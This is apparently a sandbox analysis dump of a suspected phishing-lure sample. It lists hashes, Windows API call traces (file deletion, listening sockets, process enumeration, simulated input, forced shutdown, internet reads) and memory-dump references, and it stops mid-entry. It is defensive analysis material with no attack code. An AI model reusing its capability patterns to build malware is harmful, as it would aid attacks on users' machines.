              • Opcode ID: 80da86d6ee4fd43dd4509d7a4b57e1941f139a1d73b91ab1cb58c87ba2750c93
              • Instruction ID: a4a00846a850a9a30600a08842a45cfdc66ebf14415d732849de224d6c5ab837
              • Opcode Fuzzy Hash: 80da86d6ee4fd43dd4509d7a4b57e1941f139a1d73b91ab1cb58c87ba2750c93
              • Instruction Fuzzy Hash: 896158725087069FDB14EF60C8449AFB7E9FF89310F04492EF98987291EB31E905CB92
              APIs
                • Part of subcall function 00593AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00593A97,?,?,00592E7F,?,?,?,00000000), ref: 00593AC2
                • Part of subcall function 005FE199: GetFileAttributesW.KERNEL32(?,005FCF95), ref: 005FE19A
              • FindFirstFileW.KERNEL32(?,?), ref: 005FD122
              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 005FD1DD
              • MoveFileW.KERNEL32(?,?), ref: 005FD1F0
              • DeleteFileW.KERNEL32(?,?,?,?), ref: 005FD20D
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 005FD237
                • Part of subcall function 005FD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,005FD21C,?,?), ref: 005FD2B2
              • FindClose.KERNEL32(00000000,?,?,?), ref: 005FD253
              • FindClose.KERNEL32(00000000), ref: 005FD264
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
              • String ID: \*.*
              • API String ID: 1946585618-1173974218
              • Opcode ID: 1756be396cd6ae1f585bb832fb1323dd57386a0667dcb92921fbd581d01fc0b5
              • Instruction ID: 6783bd6b304ff164d99574831ef11bede3411081cc411e664ab579d9405ddabb
              • Opcode Fuzzy Hash: 1756be396cd6ae1f585bb832fb1323dd57386a0667dcb92921fbd581d01fc0b5
              • Instruction Fuzzy Hash: 17615D3180110EAACF15EBE4CA969FDBF76BF95300F204169E501771A1EB396F09CBA1
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
              • String ID:
              • API String ID: 1737998785-0
              • Opcode ID: 96dd50edf96378bc25f411caa3b0d96e87a9a0410e96464fd58d0f3f4a12a30d
              • Instruction ID: 0753ed53f6d8324883067e11dc7da9453558c8d1126998b490fe8dab08bd7f9b
              • Opcode Fuzzy Hash: 96dd50edf96378bc25f411caa3b0d96e87a9a0410e96464fd58d0f3f4a12a30d
              • Instruction Fuzzy Hash: F8419D35244621AFD724DF15D888B5ABBE2FF44328F14C499E41A8B7A2C776FD42CB90
              APIs
                • Part of subcall function 005F16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005F170D
                • Part of subcall function 005F16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005F173A
                • Part of subcall function 005F16C3: GetLastError.KERNEL32 ref: 005F174A
              • ExitWindowsEx.USER32(?,00000000), ref: 005FE932
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
              • String ID: $ $@$SeShutdownPrivilege
              • API String ID: 2234035333-3163812486
              • Opcode ID: c3630f7a0f9538c7da452e057c408a039dd69601571eac77db35b541513ec28f
              • Instruction ID: 3be501ff46d79050c84c8d81a418dc8b24136b192c0b063af859c344124f29dd
              • Opcode Fuzzy Hash: c3630f7a0f9538c7da452e057c408a039dd69601571eac77db35b541513ec28f
              • Instruction Fuzzy Hash: D4012632610619AFEB2427B49E8BFBF7A9CBB04751F150921FE02E20E1D9E85C4081B4
              APIs
              • socket.WSOCK32(00000002,00000001,00000006), ref: 00611276
              • WSAGetLastError.WSOCK32 ref: 00611283
              • bind.WSOCK32(00000000,?,00000010), ref: 006112BA
              • WSAGetLastError.WSOCK32 ref: 006112C5
              • closesocket.WSOCK32(00000000), ref: 006112F4
              • listen.WSOCK32(00000000,00000005), ref: 00611303
              • WSAGetLastError.WSOCK32 ref: 0061130D
              • closesocket.WSOCK32(00000000), ref: 0061133C
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorLast$closesocket$bindlistensocket
              • String ID:
              • API String ID: 540024437-0
              • Opcode ID: bf4a17383dedf66d349ca0a9d62c04e04cc0521acc7eac9be64bd99c30515a44
              • Instruction ID: ca1b8ab333d3d98c2795dfc54df9dc6541546261de6052d2ea421c6a82430035
              • Opcode Fuzzy Hash: bf4a17383dedf66d349ca0a9d62c04e04cc0521acc7eac9be64bd99c30515a44
              • Instruction Fuzzy Hash: AA41A1316001419FD720DF24C498BA9BBE6BF86328F188088D9568F396C775EDC2CBE1
              APIs
              • _free.LIBCMT ref: 005CB9D4
              • _free.LIBCMT ref: 005CB9F8
              • _free.LIBCMT ref: 005CBB7F
              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00633700), ref: 005CBB91
              • WideCharToMultiByte.KERNEL32(00000000,00000000,0066121C,000000FF,00000000,0000003F,00000000,?,?), ref: 005CBC09
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00661270,000000FF,?,0000003F,00000000,?), ref: 005CBC36
              • _free.LIBCMT ref: 005CBD4B
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _free$ByteCharMultiWide$InformationTimeZone
              • String ID:
              • API String ID: 314583886-0
              • Opcode ID: e8cd9c066cf3221c2a659953e714d56afbd8706680d04b599b80c4d732d0f46e
              • Instruction ID: 3d077ce44c5d4ec57b6f951218afe28cc360077d5f163aeeff037958a33ac416
              • Opcode Fuzzy Hash: e8cd9c066cf3221c2a659953e714d56afbd8706680d04b599b80c4d732d0f46e
              • Instruction Fuzzy Hash: F0C11471904246AFEB209FE88C56FAA7FB9FF82310F18459EE494DB251E7319E41CB50
              APIs
                • Part of subcall function 00593AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00593A97,?,?,00592E7F,?,?,?,00000000), ref: 00593AC2
                • Part of subcall function 005FE199: GetFileAttributesW.KERNEL32(?,005FCF95), ref: 005FE19A
              • FindFirstFileW.KERNEL32(?,?), ref: 005FD420
              • DeleteFileW.KERNEL32(?,?,?,?), ref: 005FD470
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 005FD481
              • FindClose.KERNEL32(00000000), ref: 005FD498
              • FindClose.KERNEL32(00000000), ref: 005FD4A1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
              • String ID: \*.*
              • API String ID: 2649000838-1173974218
              • Opcode ID: 3679e5092c3f8f6017875fdf2be5296ba44b8b9e05e74e62ea933cd6174324f7
              • Instruction ID: 04c61d9618522cf42cac1e08368325f749b7f3836c8c0c6be1d33f274b27d0f5
              • Opcode Fuzzy Hash: 3679e5092c3f8f6017875fdf2be5296ba44b8b9e05e74e62ea933cd6174324f7
              • Instruction Fuzzy Hash: 40317E310083469BCB10EF64C8998BFBBB9BEE1314F444E1DF5D5931A1EB64AA09D763
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: e354a39282472bcf2c39c02edd687bd5e95d44c067151744710fd2cb1eef3f27
              • Instruction ID: 823102a0df4885f89a926b5121e9718d67bb2c3f26840cb576208201c811164a
              • Opcode Fuzzy Hash: e354a39282472bcf2c39c02edd687bd5e95d44c067151744710fd2cb1eef3f27
              • Instruction Fuzzy Hash: 37C23871E046298FDB25CE689D45BEABBB6FB48304F1445EED40EE7241E774AE818F40
              APIs
              • _wcslen.LIBCMT ref: 006064DC
              • CoInitialize.OLE32(00000000), ref: 00606639
              • CoCreateInstance.OLE32(0062FCF8,00000000,00000001,0062FB68,?), ref: 00606650
              • CoUninitialize.OLE32 ref: 006068D4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CreateInitializeInstanceUninitialize_wcslen
              • String ID: .lnk
              • API String ID: 886957087-24824748
              • Opcode ID: ee12270b9f02bc40badcf58e039b4623401e36c531a764180b4d509544e480c3
              • Instruction ID: dbf7025d0777ede97ff56d8c982fc7507597d948ade19420997e49f7c857fad4
              • Opcode Fuzzy Hash: ee12270b9f02bc40badcf58e039b4623401e36c531a764180b4d509544e480c3
              • Instruction Fuzzy Hash: 43D14A715082029FC714EF24C8859ABBBE9FFD8704F40496DF5958B291EB71ED09CBA2
              APIs
              • GetForegroundWindow.USER32(?,?,00000000), ref: 006122E8
                • Part of subcall function 0060E4EC: GetWindowRect.USER32(?,?), ref: 0060E504
              • GetDesktopWindow.USER32 ref: 00612312
              • GetWindowRect.USER32(00000000), ref: 00612319
              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00612355
              • GetCursorPos.USER32(?), ref: 00612381
              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006123DF
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$Rectmouse_event$CursorDesktopForeground
              • String ID:
              • API String ID: 2387181109-0
              • Opcode ID: 128fff0826028b8e0b46187f067c004ce83f68351e74c7df3b30f56e7c1d50a8
              • Instruction ID: 5b02b67ef57f0a59bcb80e65f8880f9bee8a188f5dc4d1cd69928b9a39878fdd
              • Opcode Fuzzy Hash: 128fff0826028b8e0b46187f067c004ce83f68351e74c7df3b30f56e7c1d50a8
              • Instruction Fuzzy Hash: E831E272504716AFC720DF14C849B9BBBAAFFC4310F040919F995A7291DB34EA59CBD2
              APIs
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00609B78
              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00609C8B
                • Part of subcall function 00603874: GetInputState.USER32 ref: 006038CB
                • Part of subcall function 00603874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00603966
              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00609BA8
              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00609C75
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
              • String ID: *.*
              • API String ID: 1972594611-438819550
              • Opcode ID: df8a2a17edd515b508af13b277b7f5280302c9c056ace2bbb774a99d782d9f99
              • Instruction ID: 0f2787616b7eb8970caad18489c4867f0ce3bbb276bebfb0b361c7cf9cba0f3f
              • Opcode Fuzzy Hash: df8a2a17edd515b508af13b277b7f5280302c9c056ace2bbb774a99d782d9f99
              • Instruction Fuzzy Hash: 73414F7194460A9FDF18DF64C849AEFBBBAFF55310F244159E805A2291EB309E45CF60
              APIs
                • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
              • DefDlgProcW.USER32(?,?,?,?,?), ref: 005A9A4E
              • GetSysColor.USER32(0000000F), ref: 005A9B23
              • SetBkColor.GDI32(?,00000000), ref: 005A9B36
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Color$LongProcWindow
              • String ID:
              • API String ID: 3131106179-0
              • Opcode ID: 81925a720444ae19c71be5ef114ca16778d0b4a7cc917abbfadaa569682c07a1
              • Instruction ID: 56e44f7cd726ab21e4c73f14da11cb5141e8145d0e98fb9326d77b3262e18612
              • Opcode Fuzzy Hash: 81925a720444ae19c71be5ef114ca16778d0b4a7cc917abbfadaa569682c07a1
              • Instruction Fuzzy Hash: CCA118701084B8BFE72CAA3D9C48E7F2E9EFBCB344F14460AF542DA591CA259D01D676
              APIs
                • Part of subcall function 0061304E: inet_addr.WSOCK32(?), ref: 0061307A
                • Part of subcall function 0061304E: _wcslen.LIBCMT ref: 0061309B
              • socket.WSOCK32(00000002,00000002,00000011), ref: 0061185D
              • WSAGetLastError.WSOCK32 ref: 00611884
              • bind.WSOCK32(00000000,?,00000010), ref: 006118DB
              • WSAGetLastError.WSOCK32 ref: 006118E6
              • closesocket.WSOCK32(00000000), ref: 00611915
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
              • String ID:
              • API String ID: 1601658205-0
              • Opcode ID: d4a8d58b7ba8b825337c8d92dd433369cca64c0814dbce7faa33506dbcc5e5fe
              • Instruction ID: 2c59d74b4bf448e15a0930fbffced8ef56444ddb9ffe7b28ebd06b501ae4e13b
              • Opcode Fuzzy Hash: d4a8d58b7ba8b825337c8d92dd433369cca64c0814dbce7faa33506dbcc5e5fe
              • Instruction Fuzzy Hash: D651C671A002109FDB10AF24C88AF6E7BE6AB89718F08C458F9155F3D3D771ED428BA1
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$EnabledForegroundIconicVisibleZoomed
              • String ID:
              • API String ID: 292994002-0
              • Opcode ID: 91276283093ebf7415f78201b44c64f05ccc1a6960e37541462f872040a12506
              • Instruction ID: ed76665774a29b9cbace9124beb2c85e2998563261cb52c8b64998d7b953d7c4
              • Opcode Fuzzy Hash: 91276283093ebf7415f78201b44c64f05ccc1a6960e37541462f872040a12506
              • Instruction Fuzzy Hash: 1121D635744A215FD7208F1AE854B6A7BE6FFA6324B198068E8458F351C775EC42CF90
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
              • API String ID: 0-1546025612
              • Opcode ID: 826a518b25f97a7c6dbe5ca9fc25f8cc423097537427984c942acb4129e96347
              • Instruction ID: d1858e9d2966cd0bf040140332f1031adac44e773e6337853f188bc723f6a1ff
              • Opcode Fuzzy Hash: 826a518b25f97a7c6dbe5ca9fc25f8cc423097537427984c942acb4129e96347
              • Instruction Fuzzy Hash: 60A26C75A0061ACBDF34CF58C8407BEBBB1BB55314F2485ABE815AB385EB349D85CB90
              APIs
              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 005F82AA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: lstrlen
              • String ID: ($tbe$|
              • API String ID: 1659193697-2251899736
              • Opcode ID: 0714c2f9792f3b0a7f724e3e0d34eb4ba4ce9edbbab4a2065b37d92a83930e93
              • Instruction ID: f930b2a4645803332efc36b8ac4d6ce8f1427d64529d6677edb52d23c2480c63
              • Opcode Fuzzy Hash: 0714c2f9792f3b0a7f724e3e0d34eb4ba4ce9edbbab4a2065b37d92a83930e93
              • Instruction Fuzzy Hash: 13323775A006059FCB28CF59C481A7ABBF0FF48710B15C96EE59ADB3A1EB74E941CB40
              APIs
              • CreateToolhelp32Snapshot.KERNEL32 ref: 0061A6AC
              • Process32FirstW.KERNEL32(00000000,?), ref: 0061A6BA
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
              • Process32NextW.KERNEL32(00000000,?), ref: 0061A79C
              • CloseHandle.KERNEL32(00000000), ref: 0061A7AB
                • Part of subcall function 005ACE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,005D3303,?), ref: 005ACE8A
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
              • String ID:
              • API String ID: 1991900642-0
              • Opcode ID: 018a095e2c6e942274d72fcb9bb2700feb0dea4e6c9ad5f87d15a888a085d828
              • Instruction ID: ff86f9c22814b1e9f28664dffacada08c9dd0f8151d30f69fd418f994c8af76a
              • Opcode Fuzzy Hash: 018a095e2c6e942274d72fcb9bb2700feb0dea4e6c9ad5f87d15a888a085d828
              • Instruction Fuzzy Hash: 4E512871508301AFD710EF64C88AA6BBBE9FFC9754F44492DF58997291EB30D904CB92
              APIs
              • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 005FAAAC
              • SetKeyboardState.USER32(00000080), ref: 005FAAC8
              • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 005FAB36
              • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 005FAB88
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: KeyboardState$InputMessagePostSend
              • String ID:
              • API String ID: 432972143-0
              • Opcode ID: 3a99e0ba08c3829a58fade4e8891c1c8b38e492c2a4cd9788aa17a338937c4d5
              • Instruction ID: 84c48138a1a355aaa2d28d1d24c184043c76a572bc3726ec9c67289f746d15fe
              • Opcode Fuzzy Hash: 3a99e0ba08c3829a58fade4e8891c1c8b38e492c2a4cd9788aa17a338937c4d5
              • Instruction Fuzzy Hash: A131E7B0A8064CAEFB358B64CC05BFA7FAABB44320F04461AE689561D1D77D8985C763
              APIs
              • InternetReadFile.WININET(?,?,00000400,?), ref: 0060CE89
              • GetLastError.KERNEL32(?,00000000), ref: 0060CEEA
              • SetEvent.KERNEL32(?,?,00000000), ref: 0060CEFE
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
